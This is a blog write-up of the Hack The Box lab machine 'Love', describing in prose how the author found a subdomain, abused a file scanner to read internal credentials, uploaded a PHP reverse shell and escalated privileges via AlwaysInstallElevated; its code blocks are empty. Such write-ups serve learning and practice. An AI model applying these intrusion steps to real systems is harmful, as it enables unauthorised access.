ūüĒéūü¶∂Enumeration/Foothold

Love is an Easy box from HTB and created by pwnmeow. This box features subdomain lookup and AlwaysInstallElevated privesc. I start every scan with an¬†RustScan¬†and convert it to a PDF for easier viewing. This is bundled into my setup.sh script which I’ve mentioned in a few of my other posts. RustScan with NMAP filters shows a website with registration available on Port 80. I also notice¬†Port 443¬†is open so I navigate over to the¬†HTTPS¬†version of the website. I see a certificate with some useful information.

Port 80 showing the Voting System screen.

Port 80 showing the Voting System screen.

HTTPS Certificate showing some useful information.

HTTPS Certificate showing some useful information.

Seeing the certificate I notice a subdomain. I add the primary domain and the subdomain to my host file.

Copy
Adding sub-domain to my host file.

Adding sub-domain to my host file.

I also note down the¬†[email protected]¬†address as possible username and ValentineCorp as a possible company. I visit both domains with¬†HTTPS¬†and get a pop on the staging website.

Staging File Scanner website.

Staging File Scanner website.

I notice at the top of the screen that a Demo link is available. I setup a nc listener and click Scan file I get a hit back showing that code execution via RFI or traversal might be possible.

After striking out for a few minutes my NMAP scan finishes. Reviewing the results I notice that Port 5000 is running a website and giving a 403 Error.

Port 5000 showing 403 Forbidden.

Port 5000 showing 403 Forbidden.

I use the file scanner to navigate to the page and pick up the credentials for the voting system.

Free File Scanner shows the Password Dashboard.

Free File Scanner shows the Password Dashboard.

I note down the credentials in my notes and head over to the voting page. Upon logging in I note down the name of the user we are logged in as and notice the Copyright for the site says 2018. As this box came out in 2021 we can assume this is intentional.

Google showing me the way...

Google showing me the way…

After viewing the ExploitDB article I was unable to get a response. Instead I tried the exploit manually which worked.

Creating a new malicious candidate.

Creating a new malicious candidate.

I created a Candidate and uploaded a¬†shell.php¬†which is a fork of the PenTestMonkey¬†PHP¬†reverse shell. To catch the shell I setup a¬†nc¬†listener –

Copy

ūüĒĚEscalation

Once on the system I get the user flag and create a directory in the Windows\Temp directory and download WinPEAS to the box. The scan comes back that AlwaysInstallElevated is enabled.

Copy
LinPEAS showing AlwaysInstallElevated.

LinPEAS showing AlwaysInstallElevated.

I kill the session for the PHP shell and change the port to 9001. This is because my setup script creates MSFVenomshells that default to Port 1234. I alter the PHP shell and get back into the environment. I then pull the .MSI shell I have to perform the privilege escalation.

‚ö† Attack Machine

Copy

ūüéĮVictim Machine

Copy
Rooted Love from HTB.

Rooted Love from HTB.

Rooted

Published On: August 5th, 2021 / Categories: HTB, Technology / Tags: , , , , /

Leave A Comment